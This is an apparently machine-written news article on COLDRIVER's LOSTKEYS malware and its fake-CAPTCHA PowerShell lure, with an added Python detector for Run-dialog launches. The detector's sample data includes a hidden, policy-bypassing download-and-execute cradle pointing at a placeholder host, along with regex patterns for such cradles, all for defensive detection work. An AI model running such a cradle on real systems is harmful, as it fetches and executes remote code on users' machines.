

Ethical Hacking News

COLDRIVER: The Sophisticated Malware Threatening Western Targets and NGOs



COLDRIVER, a Russian government-backed threat group, has been linked to a new malware campaign known as LOSTKEYS, which poses a significant threat to Western targets and NGOs. This campaign uses sophisticated social engineering techniques to deliver malware via PowerShell commands, with the primary goal of intelligence collection in support of Russia's strategic interests.

  • COLDRIVER, a Russian government-backed threat group, has been linked to a new malware campaign known as LOSTKEYS.
  • LOSTKEYS is designed to steal sensitive information from compromised systems and sends system information and running processes to the attacker.
  • The malicious campaign uses a lure website with a fake CAPTCHA to trick users into executing PowerShell commands.
  • COLDRIVER has been targeting Western targets, including current and former advisors to governments, journalists, think tanks, and NGOs, as well as individuals connected to Ukraine.
  • LOSTKEYS poses a significant threat to Western targets and NGOs, requiring them to exercise caution when encountering suspicious sites.



    The threat landscape continues to evolve at a rapid pace, with new actors emerging and old ones adapting their tactics. One such actor is COLDRIVER, a Russian government-backed threat group that has been making headlines in recent months. In this article, we will delve into the world of COLDRIVER and explore the malware known as LOSTKEYS, which poses a significant threat to Western targets and NGOs.

    The discovery of LOSTKEYS marks a new development in the toolset of COLDRIVER, a group primarily known for credential phishing against high-profile targets. While they have been linked to several notable campaigns targeting officials in the UK and an NGO, this latest malware is designed to achieve a similar goal: stealing sensitive information from compromised systems.

    According to Google Threat Intelligence Group (GTIG), LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker. This behavior is reminiscent of other APT actors who have used social engineering techniques to deliver malware via PowerShell commands.

    The malicious campaign begins with a lure website featuring a fake CAPTCHA. Once the CAPTCHA has been "verified," a PowerShell command is copied to the user's clipboard, and the page prompts the user to paste and execute it via the Windows "Run" prompt. The first stage of the script fetches and executes the second stage, which is retrieved from a hardcoded address.

    Each observed instance of this chain uses unique identifiers that must be present in the request to retrieve the next stage. This step is likely done to evade execution in VMs. The third stage is a Base64-encoded blob, which decodes to more PowerShell. This stage retrieves and decodes the final payload, pulling down two additional files from the same host as the others.

    The decoding process uses unique keys per infection chain. One of the keys is stored in the "decoder" VBS file, and the other is stored in the third stage. The decoder applies a substitution cipher to the encoded blob, using these two keys to decode it.
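    The execution chain described above leaves a characteristic trace in process-creation telemetry: a command pasted into the Windows Run dialog starts as a child of explorer.exe, and the first stage has to hide its window and fetch the next stage from a remote address. The following detection logic is an added example written for this article, not code from GTIG's report or from the malware; it scores constructed, Sysmon-style process-creation records (the event fields, user names and example.invalid URLs are all made up) and flags the combination of traits that a copy/paste PowerShell lure produces.

```python
"""Score process-creation events for the copy/paste PowerShell lure pattern.

Constructed example: the events below imitate the fields of a Windows
process-creation log (Sysmon Event ID 1 / Security 4688). They are not real
telemetry and the hosts named in them do not exist.
"""
import re

SAMPLE_EVENTS = [
    {   # user pasted a clipboard command into Win+R (child of explorer.exe)
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/stage2)"',
        "user": "CORP\\analyst",
    },
    {   # benign scheduled backup script launched from cmd.exe
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -File C:\scripts\backup.ps1",
        "user": "CORP\\svc-backup",
    },
    {   # user opened an interactive shell from the Start menu
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe",
        "user": "CORP\\admin",
    },
    {   # software deployment downloading an installer (one trait only)
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -NoProfile -Command "Invoke-WebRequest -Uri https://updates.example.invalid/x.msi -OutFile C:\\temp\\x.msi"',
        "user": "NT AUTHORITY\\SYSTEM",
    },
]

# Traits of the first stage: hidden window, execution-policy bypass,
# a download-and-execute cradle, or an encoded command.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
EP_BYPASS = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)
CRADLE = re.compile(
    r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|iex|invoke-expression|"
    r"downloadstring|net\.webclient)\b", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def is_run_dialog_launch(event):
    """PowerShell started by explorer.exe, which is how a Win+R / Run
    dialog launch appears in process telemetry."""
    return (_basename(event["parent_image"]) == "explorer.exe"
            and _basename(event["image"]) in ("powershell.exe", "pwsh.exe"))


def score_event(event):
    """Return (score, reasons): one point per suspicious trait observed."""
    reasons = []
    cmd = event["command_line"]
    if is_run_dialog_launch(event):
        reasons.append("powershell spawned by explorer.exe (Run dialog)")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    if EP_BYPASS.search(cmd):
        reasons.append("execution policy bypass")
    if CRADLE.search(cmd):
        reasons.append("download/execute cradle")
    if ENCODED.search(cmd):
        reasons.append("encoded command")
    return len(reasons), reasons


def analyze(events, threshold=3):
    """Return the events whose trait score reaches the threshold."""
    findings = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append({"user": ev["user"], "score": score,
                             "reasons": reasons, "command_line": ev["command_line"]})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['user']}: score {f['score']} ({', '.join(f['reasons'])})")
        print("  " + f["command_line"])
```

    The threshold keeps single-trait events such as an interactive shell or a legitimate installer download below the alerting line, while the pasted lure command trips four traits at once. In a real deployment the same scoring can be applied to the RunMRU registry history or to a SIEM's process-creation table, and the explorer.exe parent check is the trait that most directly distinguishes a Run-dialog paste from scripted automation.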

    In recent months, COLDRIVER has been targeting current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGOs. They have also continued to target individuals connected to Ukraine, with the primary goal of intelligence collection in support of Russia's strategic interests.

    The use of LOSTKEYS marks a new development in COLDRIVER's toolkit, one that poses a significant threat to Western targets and NGOs. As such, it is essential for these organizations to exercise caution when encountering sites that prompt them to copy, paste, and execute PowerShell commands.

    In addition to the indicators of compromise (IOCs) listed in GTIG's post, GTIG has also identified two additional samples dating back to December 2023, which use a distinctly different execution chain from the one described here. It is currently unclear whether these December 2023 samples are related to COLDRIVER or whether the malware was repurposed from a different developer or operation.

    As with any emerging threat, it is essential for organizations and individuals to stay vigilant and take proactive measures to protect themselves. This includes using advanced protection programs, enabling Enhanced Safe Browsing for Chrome, and ensuring that all devices are updated.

    In conclusion, COLDRIVER's latest malware campaign poses a significant threat to Western targets and NGOs. As such, it is essential for these organizations to exercise caution when encountering sites that prompt them to copy, paste, and execute PowerShell commands. By staying vigilant and taking proactive measures, we can work together to mitigate the impact of this emerging threat.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/COLDRIVER-The-Sophisticated-Malware-Threatening-Western-Targets-and-NGOs-ehn.shtml

  • https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos/

  • https://www.darkreading.com/ics-ot-security/russia-coldriver-apt-unleashes-custom-spica-malware


  • Published: Wed May 7 10:09:34 2025 by llama3.2 3B Q4_K_M












